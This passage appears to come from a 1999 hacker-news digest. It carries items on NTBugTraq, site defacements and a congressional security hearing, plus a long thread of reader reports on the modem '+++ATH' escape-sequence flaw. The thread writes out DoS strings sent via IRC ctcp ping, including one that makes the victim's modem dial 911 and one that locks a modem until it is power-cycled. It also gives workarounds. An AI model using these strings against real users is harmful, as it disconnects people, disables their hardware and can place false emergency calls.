went online in 1997 and isn’t crazy about times the list has
posted exploits before Microsoft has had the time to fix the
problem. After all, hackers monitor the list, too. “But we’ve
had a good working relationship,” Garms said. “Russ provides
an important service.... The reality is, an independent forum
is always going to be useful.”
Anti-virus vendors also sit poised to act on every
Cooper-NTBugTraq note — even Network Associates,
which Cooper has frequently criticized for exaggerating
security threats.
“It forces companies to keep on their toes,” said Dan
Takata, spokesman for Data Fellows Inc., another security
company. “He can’t always make everyone happy. He has
gotten flamed by top anti-virus people, but I think he’s doing a
valuable service.”
PROVING GROUNDS
Living in between software vendors and security firms
might sound like precarious work, but Cooper’s eclectic
background serves as solid preparation. He spent most of
1984-1990 running banking networks in Liberia, Africa. He
didn’t return to Canada until he was forced out during the
Liberian Revolution. He then took a job at the University of
Toronto trying to make Novell’s Netware, Oracle software,
an IBM mainframe and Windows 3.1 all work together.
During this time, he honed the fine art of pestering software
vendors by telephone, forcing them to support their products.
“I follow instructions, and when it doesn’t work, I tell
them I’m going to sue,” he said. “Asking questions is a skill.
Asking questions of a vendor is an art.”
AVOIDING RELIGIOUS WARS
Later he went to work for Tandem Computers and
subsequently held various networking jobs implementing
Microsoft software. As the Internet explosion unfolded, he
monitored mailing lists that continually slammed Windows NT
security. But in many cases, posters were making religious
statements such as “switch to Linux” more than they were
engaging in a scientific debate over what NT could or
couldn’t do. So in 1997, he filled that gap with NTBugTraq.
And thus began Cooper’s odd role as a constant public
flogger of NT’s flaws — and perhaps NT’s most public
independent supporter.
“I’m just trying to get rid of some of the religious
arguments going on,” Cooper said. “There are people bashing
NT because they didn’t know what it could do. I wanted to
get intelligent security people to tell me the real issues with
NT.”
The list now acts as a filtering service both for Microsoft
and for NT users. Instead of hundreds of e-mails from
hundreds of administrators landing at Microsoft headquarters
in Redmond, Wash., Cooper offers this promise: “You post to
NT BugTraq, and I’ll follow up with Microsoft. ... They
know if something’s coming from me, it has had a bit more
work done on it.”
SECURITYADVICE.COM
The list doesn’t just cover Windows NT administration
issues — it touches anything that might impact a computer
professional running a Windows-based network. That made
NTBugTraq a solid place for information on the most recent
security/virus crises, such as Melissa and ExploreZip.
But now he plans to expand that expertise, to all security
issues facing all Internet users.
“We’ll have two communities — one being the experts
and the other being the Mom and Pop side,” Cooper said.
He’ll then work to convince normal Internet users about the
importance of security issues. Regular contributors will
include Vin McClellan, an expert in cryptography, and Robert
Abbott, sometimes known as the father of Internet security.
Abbott was also the technical advisor for the cybercrime cult
movie “Sneakers.” And of course, information will be
available in e-mail format.
Cooper and his Securityadvice.com concept have their
detractors. He’s been criticized as a self-promoter, and his
for-profit security site idea flies in the face of computer
“purists” such as Linux coders who believe such information
should be free; or that only a non-profit organization can
really offer a “Good Housekeeping seal” for security
information.
“I’m not worried about commercializing my credibility,”
Cooper said. ”[Someone] said I am doing all this for
self-promotion. Maybe that’s true. But I’d like to think that
what I’m promoting is helping people.”
@HWA
94.0 Thanks-CGI Defaced With Its Own Script
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by Code Kid
"The Coolest CGI Magician On The Net", has been
defaced with one of its own tricks. Thanks-CGI has
been a recent victim of poor security. If you have
purchased scripts from this service in the past you may
want to double check them to be sure you are not
vulnerable as well.
7am News
http://7am.com/cgi-bin/twires.cgi?1000_t99062202.htm
Hacked Site Alleges Media Conspiracy
Updated 7:35 am PDT, 24 June 1999
By Bruce Simpson
Although repaired and back online within just a few short hours, the
Thanks-CGI website appears to have been hit a second time by the
"Hackers In Paradise" group.
This time the group appear happy to have simply changed the scrolling
javascript banner at the bottom of the page to read "HiP Welcomes you to
THANKS-CGI.... We're trying to make your site more secure for the
world!"
The operator of the website has told 7am.com that they are currently testing
for holes in their CGI scripts. They have suggested that the security hole
may not be the fault of their scripts -- rather that it could have been a
"misconfiguration between cgi script and the server."
7am.com discovered the hack while researching another story on CGI
resources and contacted the site's operator by email immediately the
problem was noticed. However, the operator of the Thanks-CGI site has
suggested that because "the arrival of your e-mail was paced so closely with
the occurence [sic] of the hackage ... we have strong reason to believe
there might be a relationship between 7am.com and the hacker who hacked
our site."
7am.com denies the allegations.
Original Report
To plagiarize and modify just a little: "As ye shall live by the Net, so shall ye
die by the Net" -- at least that's the message "Hackers in Paradise" appear
to be trying to impart on the operator of the Thanks-CGI site.
Billing itself as "The Coolest CGI Magician On The Net", the Thanks-CGI
site appears to have been left with a large amount of egg on its face after
"Hackers in Paradise" seemingly exploited a security hole in one of the
scripts and hacked the site's front page.
"Yep another site selling cgi scripts with major security problems. CGI
programmers need to spend a little time testing the security aspect of
thier [sic] scripts before trying to make money with them" is the
embarrassing message that greeted visitors to the hacked site.
7am.com has attempted to contact the operators of the Thanks-CGI site for
comment but as yet they have not replied to our email.
In the meantime, those who have purchased scripts from the site may well
be advised to get a guarantee that the same hole which allowed hackers into
the thanks-CGI site is not present in the software they purchased.
@HWA
95.0 ToorCon Date Changes
~~~~~~~~~~~~~~~~~~~~~
June 24th 1999
From HNN http://www.hackernews.com/
contributed by skalore
The date of ToorCon has changed to September
3rd-4th, 1999. There will be no San Diego 2600 Meeting
due to ToorCon falling on that date. The expo has also
moved to the Price Center in The University of
California, San Diego.
HNN Cons Page
http://www.hackernews.com/cons/cons.html
96.0 Gov Vulnerable Due to Lack of Training
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 25th 1999
From HNN http://www.hackernews.com/
contributed by Fedb0y
The Technology Subcommittee of the House Committee
on Science heard expert testimony on Thursday claiming
that computer security training is desperately needed.
The experts stressed that most federal employees do
not take computer security seriously and that this is
one reason for the numerous successful attacks on
federal systems. Another reason that was given was the
low salaries for properly trained security personnel.
When good people are found or developed in house they
are usually lured away by the private sector.
San Jose Mercury News
http://www.sjmercury.com/breaking/docs/055607.htm
ABC News
http://abcnews.go.com/sections/tech/DailyNews/hackers_govt990624.html
USA Today
http://www.usatoday.com/life/cyber/tech/ctf465.htm
APB Online
http://www.apbonline.com/911/1999/06/24/hack0624_01.html
MSNBC
http://www.msnbc.com/news/283837.asp
US House Committee on Science
http://www.house.gov/science/welcome.htm
Congress May Ask for Regular Security Reports
At the above hearing Rep. Connie Morella (R-Md.)
mentioned that federal agencies should report the
status of their computer security to Congress on a
regular basis. She plans to include the requirement in
her revisement of the Computer Security Act of 1987.
All three witnesses at the hearing agreed this was a
good idea.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0621/web-security-6-24-99.html
Additional Government Sites Defaced
While hearings where being held additional government
sites where being defaced. This time it was Monmouth
Army Base and the Argonne National Labs library.
(mirrors provided by attrition)
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
San Jose Mercury News;
Posted at 10:44 a.m. PDT Thursday, June 24, 1999
Government vulnerable to
hackers, experts warn
WASHINGTON (AP) -- Government web sites and computer
networks are increasingly vulnerable to ``cyber attacks'' because they
lack trained personnel and don't follow security plans, federal officials
warned a congressional committee today.
Few people have adequate training to defend government websites, and
those who do seldom work in government for long, three panelists told
the House Science Committee's subcommittee on technology.
The security agencies ``train people at government expense and the
private sector waves a bigger paycheck and takes them away,'' said
Keith Rhodes, technical director with the General Accounting Ooffice.
In addition, government security experts often find their advice isn't
followed, said Raymond Kammer, director of the National Institutes for
Standards and Technology, which recommends security measures for
federal computers.
``It is imperative that federal agencies implement vigorous security
programs,'' Rhodes said.
Hacker attacks like the recent defacing of the Senate web site are well
documented, but information about attempts to access sensitive
intelligence information is ``very sketchy,'' said Michael Jacobs, a
deputy director of the National Security Agency.
Hackers are often nearly impossible to trace unless they boast of their
actions.
In the most common type of attack, hackers overwhelm web sites with
a flood of requests for information, causing the site to slow or shut
down. Hackers can also redirect visitors to a fake web site that
appears to be the official site, as happened earlier this month to the
Senate site.
``We are clearly seeing an escalation in both the destructive nature and
aggressive pace of these and other attacks,'' Jacobs said.
-=-
ABC;
Gov’t Server Hacker Warning
Expert Panel Says Web Sites Are Vulnerable
By David Ho
The Associated Press
W A S H I N G T O N, June 24 — Government web
sites and computer networks are increasingly
vulnerable to “cyber attacks” because they lack
trained personnel and don’t follow security
plans, federal officials warned a congressional
committee today.
Few people have adequate training to defend
government websites, and those who do seldom work in
government for long, three panelists told the House Science
Committee’s subcommittee on technology.
The security agencies “train people at government
expense and the private sector waves a bigger paycheck
and takes them away,” said Keith Rhodes, technical
director with the General Accounting Ooffice.
No One Follows Advice
In addition, government security experts often find their
advice isn’t followed, said Raymond Kammer, director of
the National Institutes for Standards and Technology, which
recommends security measures for federal computers.
“It is imperative that federal agencies implement
vigorous security programs,” Rhodes said.
Hacker attacks like the recent defacing of the Senate
web site are well documented, but information about
attempts to access sensitive intelligence information is
“very sketchy,” said Michael Jacobs, a deputy director of
the National Security Agency.
No Crowing, No Leads
Hackers are often nearly impossible to trace unless they
boast of their actions.
In the most common type of attack, hackers overwhelm
web sites with a flood of requests for information, causing
the site to slow or shut down. Hackers can also redirect
visitors to a fake web site that appears to be the official
site, as happened earlier this month to the Senate site.
“We are clearly seeing an escalation in both the
destructive nature and aggressive pace of these and other
attacks,” Jacobs said.
-=-
Federal Computer Weekly;
House member suggests regular network security
reports
BY DIANE FRANK (diane_frank@fcw.com)
Federal agencies may soon be required to submit regular reports to Congress
on the security status of their networks, much as they now report their Year
2000 compliance.
At a House Technology Subcommittee meeting today covering reasons why
federal World Wide Web sites and systems are vulnerable to cyberattacks, Rep.
Connie Morella (R-Md.) said that in her revision of the Computer Security Act
of 1987 she plans to include a requirement for agencies to report to Congress
regularly the steps they are taking to secure their sites and systems.
All three witnesses at the hearing supported Morella's suggestion as a way to
spur agencies to move beyond planning security measures and into implementing
them. Testifying at the hearing were Keith Rhodes, director of the Office of
Computer and Information Technology Assessment at the Accounting and
Information Management Division of the General Accounting Office; Michael
Jacobs, deputy director of information systems security at the National Security
Agency; and National Institutes of Standards and Technology director Ray
Kammer.
"Security needs to stop being an afterthought," Rhodes said. "The value of
reporting would be in a standardization of agencies' ability to report," he said.
If agencies know the questions Congress will ask, they will better understand
the fundamental IT implementation steps they must take, he said.
Many agencies in the national security community already submit such reports
and have found it helpful to undergo regular security assessments, Jacobs said.
Rhodes, Jacobs and Kammer also suggested that the new computer security bill
require federal agencies to use security expertise developed by NIST and NSA
instead of "recommending" such steps, as the current act does.
@HWA
97.0 Teeside University Offers Degree in Warez
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 25th 1999
From HNN http://www.hackernews.com/
contributed by Warez Dude
The University of Teesside will soon offer a four year
degree in warez. Courses will obviously include
programing but also the history of warez, good game
design and other topics to prepare graduates for entry
into the booming computer game industry.
BBC
http://news.bbc.co.uk/hi/english/education/newsid_377000/377341.stm
Teesside University
http://www.tees.ac.uk/
BBC;
Education
Compulsory games for
students
The courses will prepare students for a career in the games industry
A university computer department is taking down notices
saying that it is forbidden to play games - and replacing
them with new signs saying that it is going to become
compulsory.
The University of Teesside is introducing a degree
course in designing computer games, which will mean
four years of playing and building games and writing
essays on such subjects as the history of computer
games.
For serious addicts of screen games, there is a course
unit dedicated to the appreciation of games, which will
involve comparing the relative merits of the latest
releases and classics such as Sonic the Hedgehog and
Super Mario.
Expanding market
The course tutor, Matthew Holton, says that the new
qualification, which will have links with games
companies, will provide graduates for the expanding jobs
market in the computer games industry.
"The course has been compiled with a great deal of
input from experts in the games industry so graduates
from these degrees may have no problem walking into
jobs," he said.
"People don't realise how large the computer games
industry has become - or that some of the best games are
developed in Britain."
The course has been
designed as practical training for a career in designing
computer games, with students spending their time
learning about how to make games and considering
which approaches produce the best results.
Serious endeavour
Mr Holton, who expects the course to attract serious
games enthusiasts, says that assessing students'
efforts will not be problematic.
"There are plenty of academic criteria that can be
applied to such a course, such as assessing the quality
of art work, lighting, animation, interaction and the user
interface."
The university is offering two degree courses for
computer games - one in the creative design for games
and the other in computer programming.
But even though the courses are dealing with games, a
university spokesman emphasised that these were not
"Mickey Mouse" subjects, but were serious vocational
courses serving a growing sector of the economy.
@HWA
98.0 FREE DefCon WebCasts
~~~~~~~~~~~~~~~~~~~~
June 25th 1999
From HNN http://www.hackernews.com/
contributed by angus
Yesterday HNN mentioned that HNC Network would be
providing a webcast of DefCon for $29.95. These sites
will also be broadcasting live audio and video streams of
selected speakers, interviews and video live from the
show floor. These feeds are FREE to the public.
Pirate Radio UK
http://www.pirate-radio.co.uk
Hacksec
http://www.hacksec.org
99.0 Old Modem Flaw Still Haunts Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 25th 1999
From HNN http://www.hackernews.com/
contributed by pbradely
Hayes, the old modem manufacturer, may not live any
longer but its legacy lives on. Hayes originally had the
patent on the escape sequence "+ + + ATH" (without
the spaces) It would appear that many modems
manufacturers are still not paying the royalties for TIES
(Time Independent Escape Sequence). As discovered
years ago this escape sequence will force many modems
to go offline or into command mode forcing a reboot. An
excellent DoS attack. MacInTouch has an interesting
new report on this OS independent problem. If you find
that you are susceptible to this ancient flaw you can
try changing the value of the S2 register to something
greater than 127. (Consult your modem manual on how
to do this.)
Macintouch Report
http://www.macintouch.com/modemsecurity.html
BugTraq Archive Sept 1998
http://geek-girl.com/bugtraq/1998_3/0916.html
Macintouch;
Modem Guard Mode/Security Defect
1.Problem Description
2.Workarounds
3.Background Info
Important note:
The incredible modem defect described below makes it impossible for many people to even view
certain character sequences without triggering the bug.
As a result we have been forced to change the modem command strings in all the examples below,
inserting spaces between the plus signs. The actual command strings have no spaces or quotes.
Problem Description
Date: Sun, 20 Jun 1999 15:01:47 -0400
From: "Mohammad A. Haque"
Subject: Global Village modem exploit?
Apparently there seems to be a problem with Global Village modems where you can cause it to execute modem commands remotely. If you
send a computer an AT command in a packet that another remote machine responds to (i.e. ctcp, ping, icmp) the modem on that machine
doe sthat command.
For example, while on irc if I sent the commad /ctcp SomeOne ping + + +ATH0, SomeOne's machine would respond to the ping and as
a result his/her modem would hang up right after that. It just doesn't stop there. Imagine sending out /ctcp SomeOne ping + + + +
ATH0ATADT911.
Is this a known problem with Global Village modems?
Mohammad A. Haque
Subject: new denial of service attack?
Date: Mon, 21 Jun 1999
From: [MacInTouch reader]
Hi there!
I was playing around this weekend and found what appears to be a denial of service attack which works with dreadful effectiveness on
iMacs and pretty much any other Mac with certain Global Village modems. It was essentially pointed out to me by a couple of kid phreakers,
and at first I dismissed it until I watched them repeatedly knock a couple of iMac and other GV users off the net.
Hopefully, you guys know all about this stuff, and there was a bug fix released that neither I nor my guinea pig tester could find. But just in
case you don't...
Modem? Yes, this attack seems to exploit a firmware issue. Apparently, the Global Village modem in the iMac as well as a few other
external modems are susceptible. I don't have the resources to test different modems, but I suspect that the problem is going to be found in
every GV with the same chipset.
Symptom: Immediate hangup/disconnection upon receiving the signal.
Technical description of the setup:
Modems have two modes- command mode, where they will process commands issued to them, and connect mode, where they simply pass
data. When you dial another modem and a connection is made, the modem switches to connect mode by default. When you wish to hang up,
a signal is sent which forces the modem into command mode so that it can interpret commands, and then processes the hangup command as
issued from the computer.
The process for switching a modem from connect mode to command mode is simple- there must be silence on the connection for a specified
amount of time, followed by the + (plus) symbol repeated 3 times (+ + +) followed by an equal silent pause. The pause is known as "Guard
Time," to ensure that your modem doesn't accidentally hang up whenever it encounters the string "+ + +" in regular communications.
Additionally, most modems can only accept the command mode string when it comes from the DTE (serial side) of the connection rather
than the remote side.
Although I've yet to confirm it, it would appear that the affected modems have their guard time duration value set to zero- meaning that the
string should throw their modems into command mode without any silence on the line before or after the switch string.
The exploit:
In simplest terms, if I can send something to a computer connected by one of these modems which will be repeated back byte for byte,
there's a fair chance that the command mode string (+ + +) will not be broken up by the characters encapsulating it within a packet (if on a
PPP connection) I don't fully understand PPP encapsulation, I would think that that alone would be enough to protect against this sort of
attack... but I've seen that it isn't.
Add it up:
If I had a super carefully constructed ICMP message, maybe a web page with a hidden form, or a malformed client to client protocol
message in an IRC session which contains '+ + +ATH0,' and some software protocol in your mac bounces it back to me.... and I can have
your Mac send + + +ATH0 to its modem... the ATH0 is of course the Hayes AT command to hang up immediately. I won't even address
the possibility that such a request could be used to totally alter the modem's configuration in its onboard NVRAM, which would wreak further
havoc.
Defense?
My first reaction would be to check the value of whatever is in the S12 register of the modem. This can be checked by feeding "AT&V" into
zterm or another terminal emulator when the modem is in command mode.
I haven't been able to find a tester who's got an affected modem *and* a working knowledge of Zterm or any other terminal emulator, so I'm
really hung up on this one- no pun intended. I am expecting to find the value set to 0.
Changing this value should eliminate the problem- it will introduce guard time to the string that the modem expects to receive. Because of the
nature of PPP encapsulation, the modem would never receive the command-mode string until it was legitimately sent from the PPP driver
itself at the end of the session.
In english, adding something like, "S12=50" to your modem init string should fix it. I can't remember what the default guard time is supposed
to be, and I've switched to a DSL connection- no modems handy.
One possible side effect of this fix is that if the guard time is set too high, the modem will ignore legitimate hangup requests from the PPP
program.
... So far I've just seen some kids using this attack on IRC servers... they broadcast it across entire channels and see who drops off. ...
From: flowerpt
Date: Mon, 21 Jun 1999 10:15:02 -0400
Subject: "modem security flaw"
This isn't a new problem. When I was working tech support back in '94 a few modem manufacturers were doing this, what they called TIES
(Time Independent Escape Sequence). They basically skipped the guard time.
Back then, it was to avoid paying royalties to Hayes, who long ago realized the guard time was essential for reliable communications. I
suppose they have a patent on it.
Some jolly folks on usenet had "do you need a new modem? + + +ATH" in their .sig. When people used terminal connections...
I don't remember the exact figure, but when we calculated the odds of it occuring randomly, it was about once per gigabyte. At the time, that
seemed huge. Now, it seems likely to occur to a good number of people each day.
Hopefully, this is all just a bad INIT string.
-Bill
Date: Mon, 21 Jun 1999 09:10:10 -0600
Subject: Modem Security Problem...
From: "Darron Froese"
Ric,
This is nothing new at all. Many modems on many different computers (on many different operating systems) are at risk here. Some estimate
10%-20% while others estimate it's closer to 30%-50%.
Take a look at the bugtraq archives for more detailed info:
1998_3/0916.html
You can follow the thread from there...
--
Darron
Subject: TIES modems and the escape sequence guard time
Date: Mon, 21 Jun 1999 11:16:29 -0400
From: Bill Coleman AA4LR
... Hayes, did, indeed, have a patent on this technology, and they strigently defended it. Since the demise of Hayes, it is unclear who now
owns this patent.
As for the occurance of this problem, when I was at Hayes and the TIES modems surfaced, Hayes initiated a protracted search for
documents which ended in + + +ATH. (The carriage return is required) The search proved fruitless.
However, Hayes started ending all of their press releases and other documents with + + +ATH. This practice continued right up until
the liquidation of Hayes earlier this year. ...
Bill Coleman, AA4LR, PP-ASEL Mail: aa4lr@radio.org
Date: 21 Jun 99 09:04:11 PDT
From: David Anderson
Subject: Modem Security Flaw
Hey Ric,
As you may know Global Village did not build the modems for the iMac, late model Wallstreets/Lombard or B&Ws. We did build some
modems for the early Wallstreets and G3 beige boxes.
QA is looking at the subject of remote denial of access as we speak and if we find anything with our modems we will post it on the web site.
Subject: iMac modem security flaw -- documentation suggests otherwise
Date: Mon, 21 Jun 1999 15:16:45 -0400
From: Josh Brannon
I have an iMac and have not yet had an opportunity to test the modem security issue you documented today (6/21/99), but with the iMac
came a document called "AT Commands.pdf" that documents the AT Commands for the "Apple Internal Modem" (whatever that means --
iMac is never explicitly stated), and in it it states clearly,
"In order to prevent the modem from responding to '+ + +' (called the 'escape sequence') it requires a one second pause before
and after the sequence. Without the pause, the modem treats the '+ + +' sequence as data rather than a command."
This seems to be at odds with the reports that users are giving, and if nothing else suggests that the security issue documented is not how
Apple intended the modem to work.
Josh Brannon
Date: Mon, 21 Jun 1999 19:25:21 -0400
From: Jack Rodgers
Subject: GV Modems and A T H
After reading the comments on send + + + A T H to some modems, I tried to send myself an email with the subject and body being "+ + + A
T H" minus the quotes and spaces. The sending disrupted the modem and seemed to cause a cycling on and off. This is on a new B&W 400
Mhz G3 and a newly installed GV Teleport Internal 56K modem and Eudora Pro 4.2 beta.
So, who's at fault? The GV Modem, Eudora....
Jack Rodgers
Subject: Modem Security Flaw
Date: Mon, 21 Jun 1999 11:57:07 -0700
From: Travis Beals
In response to one of the emails posted in the discussion about the Modem Security Flaw, I did a quick check on my Rev. A iMac's modem.
Using Microphone LT, I used the AT&V command to check the value of the S12 register, and found that it defaults to 50, not 0, as some had
supposed. Other than installing the standard Apple modem firmware updates, I have made no modification to my modem's settings. I also
checked the iMac 56K modem script to make sure it does not set S12 to 0 (it doesn't).
Although I have not (to my knowledge) experienced the modem DoS (denial of service) attack, I do not know whether my modem is
immune. If the guard time of 50ms specified in S12 is correctly implemented, there SHOULD be no problem.
-Travis
Subject: Modem Security Flaw
Date: Mon, 21 Jun 1999 23:18:40 -0500
From: Marcus Aanerud
I just wanted to confirm the modem security flaw with a Global Village 56K modem (Upgraded to V.90). As an experiment, I sent an e-mail
with the escape code at the end of it, including the carriage return, and it promply kicked me offline, just as it was supposed to be done
sending the message.
Heh... whoops!
Marcus Aanerud
Subject: Re: Modem Security Flaw
Date: Mon, 21 Jun 1999 10:52:43 -0500
From: Jonathan 'Wolf' Rentzsch
Greetings!
... About "Modem Security Flaw". Assuming you can execute arbitrary modem commands remotely, here's a great command: "+ +
+ATS3=128".
This takes the modem offline ("+ + +"), and sets the first newline character to decimal 128 ("S3=128"). It turns out the modem uses newline
character to determine when a command has been completed and executed. Usually this value is set to 13, which is the ASCII code for
"return".
However, modems will strip the high bit of incoming ASCII characters in command mode. This act makes it impossible to send characters
through to the modem whose value is greater than decimal 127.
You've just made it impossible to execute *any* commands sent to the modem. On external modems, you need to cycle the modem's power
switch to get your modem back.
On a computer with an internal modem (iMac, B&W G3), you need to restart!
-- Jonathan 'Wolf' Rentzsch
Date: Tue, 22 Jun 1999 10:49:42 -0400
From: Aaron Bratcher
Subject: Modem Security Flaw
I purchased an Apple G3 Internal modem after purchasing my blue/white G3 Tower. Someone on the IRC showed me how they could
control my modem using the /ctcp command that was described by another reader. (btw: I cannot even put that command into this e-mail
message because I am dialed up and it causes a disconnect when I send it)
Unfortunately, it is not because of the S12 register contents. After reading about that possibility, I downloaded ZTerm to check and found
that my S12 register was set to 50.
As a further check, I modified my modem script to set the S12 register to 50 just before dialing in. This too had no effect.
Apparently this is a bigger bug than simply an init string. This shows that there are problems in the firmware.
-- Aaron Bratcher
Date: Wed, 23 Jun 1999 01:38:25 -0500 From: pasupati Subject: modem hangups
This hangup problem affects motorola modemsurfer 56k modem upgraded to V90... I set S12=50 and it doesnt correct the problem. Motorola
is out of the modem business so there is no help on their site.
Date: Tue, 22 Jun 1999 22:49:30 -0700
From: filmman
Subject: Modem Security Flaw
I've confirmed the security flaw with my Global Village 56K external modem (upgraded to v.90). I sent myself an email with the "+ + + A T
H " command (minus the quotes and spaces) followed by a carriage return, and I was immediately knocked offline as the message was sent.
Using zterm, I used "AT&V" to check the S12 register, and it is 050. So apparently, the guard time of 50ms doesn't prevent the modem from
being disconnected. Either that, or it's not being implemented for some reason.
Interestingly, while I was reading your reader reports on the security flaw, I was knocked offline!
Laz
Date: Tue, 22 Jun 1999 20:06:26 -0400
From: Scott Lahteine
Subject: Modem Security Flaw
Re the modem security flaw: I had a problem months ago where a friend had sent the + + + A T H inside an email, and for a week I thought
my ISP was hanging up on me! I finally tracked it down to the code in the email, and promptly cringed. My modem is a SupraExpress 56K
external, and I'd guess that many other modems are afflicted.
Scott Lahteine
Date: Wed, 23 Jun 99 12:36:12 CST
Subject: Modem Flaw
From: (JOSH BARTON)
I tried to look at the page regarding modem flaws. I kept getting disconnected while trying to view the page. I found that most odd. Every
time it started to load my modem would disconnect. As it turns out, all of the examples on the page were tripping the modem just as the flaw
said. I am using a Global Village Speakerphone 33.6.
I worked around it by dialing into my ARA server and using MACIP to tunnel the IP stuff into my appletalk protocol.
I found it interesting that something just posting in the html would be able to disconnect the modem. This leaves the door open for a hacker to
put hidden code into a web page that could permanently disable a global village modem by disrupting it's ROM image.
Josh Barton
Date: Thu, 24 Jun 1999 05:58:19 +1000
From: David Monroe
Subject: KILLING MY MODEM
I don't know what you had on the modem report page - I tried several times to read it but my express modem disconnected and PPP froze
up. No problems elsewhere - just on this link.
David Monroe
Boda Farm BELLTHORPE 4514 Australia
Date: Wed, 23 Jun 1999 18:07:13 -0500
From: Matt
Subject: Modem Flaw
Well it appears the flaw is not limited to just GV modems. I have a BestData 56k Speakerphone modem connected to a SuperMac S900, and
emailed myself the + + + A T H command in the subject and the body and was kicked offline immediately.
"Widespread problem" could be an understatement with something so simple able to kick so many people.
Many thanks to MacInTouch for making us aware of this and providing workarounds for it.
Matt Perkins
Michigan USA
Date: Wed, 23 Jun 1999 18:18:45 -0700
From: John W Baxter
Subject: Modem escape sequence note (ongoing discussion)
Some readers have mentioned that S12 does contain 50 on certain modems. Others have mentioned that the same modems have the escape
sequence A T H flaw. And one reader set S12 to 50 and found that doing so didn't help.
None of this is surprising: a modem may very well implement S12 and let it hold values without using the register for anything. On a modem
with the usual implementation of the guard time for the + + + escape sequence, S12 contains the time. On modems which don't implement the
guard time, S12 holds a number unrelated to the escape sequence--and probably unrelated to anything else.
--John
Date: Wed, 23 Jun 1999 23:03:04 -0400
From: Carl Foner
Subject: Help
First off, I love MacInTouch. It's about as much a daily ritual as brushing my teeth.
I read with interest the note about modem problems. I clicked on the link to read the story, it started loading, but then my ppp connection
dropped. I thought it was odd, so I tried it again. Same problem. It happened another 10 or so times, before I tried going through several
diagnostics, checking settings, cables, etc.
After no luck I went back online and tried looking at some other stuff. No problem. I went around for 10 or 20 minutes andthings were fine.
Then, I went back to the modem problems story. In about 10 seconds my connection dropped. I tried a couple more times and got the same
response.
I'm sure you'll agree that my modem having trouble getting to a story about modem trouble, is more than a little ironic.
Any thoughts?
Thanks,
Carl Foner
Date: Wed, 23 Jun 1999 17:19:44 -0500
Subject: "modem flaw"
From: "Robert Westerman"
Whenever I click on the link for "modem flaw" it drops my connection and I can never make it to the article.
This really is a modem flaw.
Is it me or is it memorex???
Thank you,
Robert Westerman
Date: Thu, 24 Jun 1999 23:46:53 +0100
Subject: Macintosh Modem Woes
From: "John Gibbs"
Ric,
Just on a whim I tried sending the "+++" "ATH" commands to myself, via email... As you can see from the way I wrote them, they caused
my modem to hang up immediately. The odd thing is, my modem is a generic V.90 modem for the PC. The brand itself is DCS or some such,
I picked it up at a local computer (read PC) fair here in London. I guess it uses the same chipset as Apple's/GV's (I believe my unit uses a
Rockwell chipset).. It would seem that this bug affects a good number of modems.
However, the good news is that Massimo Valle's tip works great even on el-cheapo no-name modems like mine.. I think I speak for
everyone when I give a whole-hearted THANKS! to Massimo.
Regards,
-John
London, UK
Date: Thu, 24 Jun 1999 11:36:50 -0400
From: Yann
Subject: Modem flaw on SupraExpress 56k too
Hi!
The string "+ + + A T H", without the spaces, when sent in the subject line of an e-mail message, with Eudora Light, disconnected my
Diamond Multimedia SupraExpress 56k V.90 immediately.
Adding S2=127 to the init string fixes it.
Apple and Diamond need to release fixed ARA scripts for this ASAP.
- Yann Duguay
Date: Thu, 24 Jun 1999 23:12:55 -0400
From: Richard Outerbridge
Subject: modem flaw weaselling
1999-06-24 22:57:46 EDT The devil is in the details... the Apple pdf file describing modem commands ("AT Commands for the Apple
Internal Modem") only promises that the S12 register will control the modem's response to the escape sequence. Quote:
S12 register (Guard time)
.... If any characters are detected during this time, the OK will not be sent. Note that sending of the OK result code
does not affect entry into command mode.
In other words, my modem, which exhibits the DOS vulnerability, is behaving exactly according to its specifications: the value in S12 only
determines whether or not the modem sends back OK in response to the escape sequence, NOT whether or not it enters command mode in
response to the escape sequence. I detect the presence of patent lawyers... class-action lawsuit, anyone?
And yes, adding "S2=128" to all my init strings seems to be an effective workaround for my purposes.
outer
Date: Thu, 24 Jun 1999 22:42:42 -0500
From: Brian Alletto
Subject: modem security flaw
Add the Zoom 56K Dualmode modem, model 2945 to your list of modems affected my the security flaw.
Brian Alletto balletto@sprintmail.com
Date: Thu, 24 Jun 1999 19:46:50 -0700
From: Joe
Subject: Modem Security Flaw & Viking Modems
Hi Guys,
Guess what? My new Viking External v.90 modem has the bug. I could not send email to myself with the subject : + + + A T H....Got
knocked off immediately, but had no problem sending the escape command in the body of the message.
I'm calling Viking right now and digging out the ole trusty Hayes Optima 33.6
Thanks for the tip.......Keep up the good work.
Joe
Workarounds
Date: Mon, 21 Jun 1999 14:26:26 -0400
Subject: iMac escape code
From: "Chris Dembitz"
For iMac users using Ircle (an irc client) the excellent freeware irc script package Hipscript will protect against any /ctcp-based DoS
attack that uses the + + + code, in addition to providing many other useful features. I personally tested this with an iMac today, and it worked
flawlessly.
Chris
From: Richard Smith
Subject: Modem Security Flaw
Date: Wed, 23 Jun 1999 13:28:18 +1200
Another S register to be aware of (like s12 for the guard time) is s2 this is the register that actually hold the escape character, there is no
reason why you cannot change that to something other than a +. decent PPP modem control software should allow you to change this setting
within them without a problem. ie ATS2=27 (27 is the escape key on the keyboard, cannot remember what the + is at them moment, but
using AT&V should tell you (assuming + is still set))
Regards
Richard Smith
Customer Support
The Zones Online
Subject: modem security flaw - the final workaround
Date: Wed, 23 Jun 1999 09:05:04 +0200
From: Massimo Valle
I want to confirm the modem security flaw. On my iMac receiving a ctcp ping + + +ATH0 cause the modem to disconnect. Also sending a
"/ctcp nickname ping + + +ATH0" to another user, cause my iMac modem to disconnect.
I have a workaround that work apparently without side effects.
The tip is to disable the escape sequence "+ + +" setting the S2 register to 127. This is the correct setting for disabling the escape sequnce, as
reported on the "AT commands" manual.
I've modified the original iMac modem script adding S2=127 and all seem work fine. Sending and receiving a ctcp ping with + + +ATH0 no
more disconnect my iMac modem.
Also the PPP disconnect correctly when I request "Disconnect" from Remote Access.
I think this work also for G3 and Powerbook G3.
enjoy it!!
Massimo Valle
ITALY
Date: Wed, 23 Jun 1999 18:34:25 -0500
From: Matt
Subject: Modem Flaw Workaround Works!
Another note for your readers:
